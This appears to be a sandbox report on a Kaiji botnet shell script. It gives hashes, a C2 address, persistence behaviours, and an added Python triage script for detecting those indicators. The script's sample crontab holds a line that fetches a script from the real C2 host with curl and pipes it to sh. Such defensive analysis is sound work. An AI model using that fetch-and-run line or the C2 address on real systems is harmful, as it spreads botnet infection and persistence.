General

  • Target

    download.sh

  • Size

    2KB

  • Sample

    250416-w94h3atygy

  • MD5

    544a2f391e2800bac07e883d902bcc75

  • SHA1

    cea67c26c372d03b795bbba678569256385d3b83

  • SHA256

    1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

  • SHA512

    f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

Malware Config

Extracted

Family

kaiji

C2

154.40.47.248:888

Targets

    • Target

      download.sh

    • Size

      2KB

    • MD5

      544a2f391e2800bac07e883d902bcc75

    • SHA1

      cea67c26c372d03b795bbba678569256385d3b83

    • SHA256

      1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

    • SHA512

      f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

    • Kaiji

      Kaiji payload

    • Kaiji family

    • File and Directory Permissions Modification

      Adversaries may modify file or directory permissions to evade defenses.

    • Executes dropped EXE

    • Modifies Watchdog functionality

      Malware such as Mirai tampers with the hardware watchdog so that it cannot reboot an infected system.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Creates/modifies environment variables

      Creating/modifying environment variables is a common persistence mechanism.

    • Enumerates running processes

      Discovers information about the processes currently running on the system.

    • Modifies init.d

      Adds or modifies a system service, likely for persistence.

    • Write file to user bin folder

    • Modifies Bash startup script
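
As an added host-triage example (not part of the sandbox report and not the sample's own code), the following Python checks a host against the indicators this report gives: the C2 at 154.40.47.248:888 and the cron, init.d, environment/profile, Bash startup and user bin persistence locations flagged in the behaviour list above. Only the hashes and the C2 address come from the report; the file contents, the `ss -tnp` output and the process name `dropped_bin` embedded in it are constructed for the demonstration.

```python
"""Host triage for the Kaiji indicators in this report (added example).

Only the hashes and the C2 address come from the report; every file
content, process name and `ss` line below is constructed for the demo.
"""
import fnmatch
import hashlib
import re

# --- Indicators from the report ------------------------------------------
C2_HOST = "154.40.47.248"
C2_PORT = "888"
KNOWN_HASHES = {
    "md5": "544a2f391e2800bac07e883d902bcc75",
    "sha1": "cea67c26c372d03b795bbba678569256385d3b83",
    "sha256": "1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca",
}

# Persistence locations corresponding to the behaviours the sandbox flagged
# (cron, init.d, environment/profile files, Bash startup scripts, user bin).
PERSISTENCE_PATTERNS = [
    "/etc/crontab", "/etc/cron.d/*", "/var/spool/cron/*",
    "/etc/init.d/*",
    "/etc/environment", "/etc/profile", "/etc/profile.d/*", "/etc/bash.bashrc",
    "/root/.bashrc", "/root/.bash_profile", "/root/.profile",
    "/home/*/.bashrc", "/home/*/.bash_profile", "/home/*/.profile",
    "/usr/bin/*", "/usr/local/bin/*",
]

# Match the C2 address only as a whole dotted quad, not inside a longer one.
C2_RE = re.compile(r"(?<![\d.])" + re.escape(C2_HOST) + r"(?![\d.])")


def hash_matches(data: bytes) -> dict:
    """Compare a file's digests against the report's hashes (name -> bool)."""
    digests = {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    return {name: digests[name] == known for name, known in KNOWN_HASHES.items()}


def is_persistence_path(path: str) -> bool:
    """True if path is one of the persistence locations listed above."""
    return any(fnmatch.fnmatch(path, pat) for pat in PERSISTENCE_PATTERNS)


def scan_files(files: dict) -> list:
    """files maps path -> text. Return (path, lineno, line) for every line in a
    persistence location that references the C2 host."""
    hits = []
    for path, text in files.items():
        if not is_persistence_path(path):
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            if C2_RE.search(line):
                hits.append((path, lineno, line.strip()))
    return hits


def scan_connections(ss_output: str) -> list:
    """Parse `ss -tnp` output; return (state, local, process) for sockets
    whose peer is the C2 host:port. The header line never matches."""
    hits = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        state, local, peer = parts[0], parts[3], parts[4]
        host, _, port = peer.rpartition(":")
        if host == C2_HOST and port == C2_PORT:
            hits.append((state, local, parts[5] if len(parts) > 5 else ""))
    return hits


# --- Constructed sample input (not from the report) -----------------------
SAMPLE_FILES = {
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "*/10 * * * * root curl -s http://154.40.47.248:888/download.sh | sh\n"
    ),
    "/root/.bashrc": "alias ls='ls --color=auto'\n",
    "/etc/init.d/netd": "#!/bin/sh\n/usr/bin/.netd 154.40.47.248 888\n",
    "/home/user/notes.txt": "see 154.40.47.248\n",  # not a persistence path
}
SAMPLE_SS_OUTPUT = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0      0      10.0.0.5:41322     154.40.47.248:888 users:(("dropped_bin",pid=1423,fd=3))
ESTAB 0      0      10.0.0.5:22        10.0.0.9:51002    users:(("sshd",pid=812,fd=4))
"""

if __name__ == "__main__":
    for hit in scan_files(SAMPLE_FILES):
        print("persistence:", hit)
    for hit in scan_connections(SAMPLE_SS_OUTPUT):
        print("c2 socket:", hit)
    print("hash match:", hash_matches(b"not the sample"))
```

On a live host, fill the dict from the real paths (read as text) and feed the output of `ss -tnp` to `scan_connections`; a positive `hash_matches` on any file confirms the exact sample. The watchdog tampering and process enumeration in the behaviour list are runtime actions and are not visible to a file scan like this one, so they need live process or syscall telemetry.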

MITRE ATT&CK Enterprise v16

Tasks